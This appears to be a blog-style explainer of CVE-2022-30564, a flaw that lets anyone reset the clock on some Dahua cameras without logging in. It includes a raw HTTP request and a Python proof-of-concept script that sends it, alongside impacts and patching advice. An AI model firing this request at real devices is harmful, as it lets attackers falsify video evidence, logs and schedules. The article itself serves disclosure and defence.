CVE-2022-30564 - How Dahua Devices Can Be Hacked to Change Their System Time
In June 2022, a security flaw named CVE-2022-30564 was discovered in certain Dahua embedded products. This vulnerability lets attackers change the system time on the device without any login or password. In this article, we'll break down how the vulnerability works, give you code snippets demonstrating the exploit, and link to the official resources. We’ll keep things simple and easy to follow.
What is CVE-2022-30564?
CVE-2022-30564 is a vulnerability found in some Dahua surveillance and IoT devices. The bug allows anyone to send a specially crafted packet—without authentication—to change the system time (the internal clock) of the device.
Messing with the device’s clock can break logs, mess up evidence chains, cause issues with scheduling, and invalidate stored video. For businesses or individuals relying on these devices for security, that’s a pretty big deal.
Which Dahua Products Are Affected?
Not every Dahua device has the issue, but various models using certain firmware from before 2022 may be vulnerable. The best way to check for your device is to consult Dahua’s official security advisory or this NVD entry for the full list.
How Does the Exploit Work?
Dahua devices often use web or API interfaces for remote configuration. This bug is in the endpoint (API) that lets you adjust the system time. Normally, only administrator-level users should be able to do this, but the endpoint forgot to ask for a password!
So if you know the right request to send—which isn’t hard to figure out—you can make the Dahua device accept your new timestamp.
Typically, the vulnerable HTTP interface will look something like this
POST /cgi-bin/global.cgi?action=setCurrentTime HTTP/1.1
Host: [device-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]
time=2024-06-05%2014:00:00
The key here is the action=setCurrentTime parameter, which should only be allowed for logged-in users. But in this vulnerability, no authentication is required.
Proof of Concept: Changing Dahua Device Time Without Authentication
Let’s walk through a simple example in Python. This script sends a crafted request to change your Dahua device’s system time.
import requests
device_ip = '192.168.1.100' # Replace with target device IP
new_time = '2024-06-05 14:00:00'
url = f'http://{device_ip}/cgi-bin/global.cgi?action=setCurrentTime';
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
data = f'time={new_time}'
response = requests.post(url, headers=headers, data=data)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")
Warning: Only try this on your own devices in a test environment.
Video Evidence Tampering: Footage timestamps could be faked or thrown out in court.
- Breaks Scheduled Actions: Anything based on time (like automation or recording schedules) may malfunction.
Log Invalidation: Logs become unreliable if their time is changed.
Attackers could use this as a step in larger attacks, for example to cover the traces of other intrusions.
How to Protect Yourself
1. Update Firmware:
Check Dahua’s official update page and upgrade your device to the latest software.
2. Network Segmentation:
Keep security cameras and related equipment on isolated networks, not exposed to untrusted users or the internet.
3. Firewall Rules:
Block all unnecessary inbound access to these devices, especially from the internet.
Links to References
- Official Dahua CVE-2022-30564 Security Bulletin
- US National Vulnerability Database Entry
- Exploit Database (example entry)
Conclusion
CVE-2022-30564 is a classic example of what happens when developers forget to lock down sensitive features. Even small oversights—like missing authentication on a time-setting function—can lead to big security risks in the real world.
If you use Dahua products, check them now. Update your systems and keep them off public networks when you can. Even a tiny bug can make a huge difference when it comes to the devices we trust for our security.
Timeline
Published on: 02/09/2023 17:15:00 UTC
Last modified on: 02/16/2023 22:00:00 UTC